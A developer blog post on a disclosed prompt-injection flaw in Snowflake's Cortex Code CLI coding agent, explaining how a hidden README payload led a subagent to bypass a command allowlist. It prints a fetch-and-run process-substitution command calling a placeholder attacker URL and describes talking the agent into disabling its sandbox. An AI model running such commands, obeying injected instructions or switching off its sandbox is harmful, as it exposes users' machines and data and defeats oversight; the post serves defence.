DEV Community

蟹仔
蟹仔

Posted on

Command Allowlists Cannot Stop Hackers — The Snowflake Cortex AI Hack

#security #ai #promptinjection

Why Should You Care?

Because I use the same tool stack every day — OpenClaw, coding agents, exec tools.

If you think adding a "command allowlist" protects you, this article is for you.

What Happened

Feb 2, 2026: Snowflake launches Cortex Code CLI — a command-line coding agent with built-in Snowflake database integration.

Feb 5 (3 days later): Security researchers PromptArmor find and responsibly disclose the vulnerability.

Feb 28: Snowflake releases fix in version 1.0.25.

Mar 16: Full public disclosure.

How the Attack Worked

The technique was simple, but the defenders never saw it coming.

Step 1: You ask Cortex to review an open-source codebase (you do not know the README has hidden payload at the bottom)

Step 2: Cortexs subagent reads the README and triggers a prompt injection that makes it think it needs to run a "safe" command

Step 3: Heres the killer — the attack used process substitution:

cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))
Enter fullscreen mode Exit fullscreen mode

The command validation system checked each individual command against a "safe" allowlist. But nobody thought to validate what happens inside < <() expressions.

Step 4: Cortex could also be manipulated to disable sandbox mode entirely — just by saying "disable_sandbox"

Result: Remote code execution on your machine, data theft, database deletion.

The Industry Consensus: Pattern Matching is Broken

Simon Willison put it bluntly:

"Command allowlists are fundamentally unreliable. I have seen a bunch of different agent tools use command pattern matching like this and I do not trust them at all."

His advice is clear: Do not rely on pattern matching to secure your exec tools.

What This Means for Us

1. Sandboxes are not foolproof
Even with sandbox enabled, AI can be manipulated to disable it. What you thought was your last line of defense was theater.

2. Subagents are a double-edged sword
In this incident, Cortex invoked multiple layers of subagents. By the second level, the main agent had no idea malicious commands had already executed.

3. Trusting external data is dangerous
Any untrusted source — database records, web search results, code repo READMEs — can be an attack vector.

How Do We Protect Ourselves?

Honestly, there is no perfect answer. But some things are clear:

  • Stop relying on pattern matching — there will always be a bypass you did not think of
  • Minimize agent system permissions — less damage if compromised
  • Isolate sensitive operations — database access should not flow through the same agent session
  • Log everything — most Hong Kong companies skip this until it is too late

The Bottom Line

AI agents are powerful tools, but we cannot be naive about security through pattern matching.

Nothing is 100% secure. The question is how much risk you are willing to accept.

Rather than trusting tools to protect you, assume they can be manipulated from the start.

Sources: PromptArmor / Snowflake Security Advisory / Simon Willison
https://news.ycombinator.com/item?id=47427017

Top comments (0)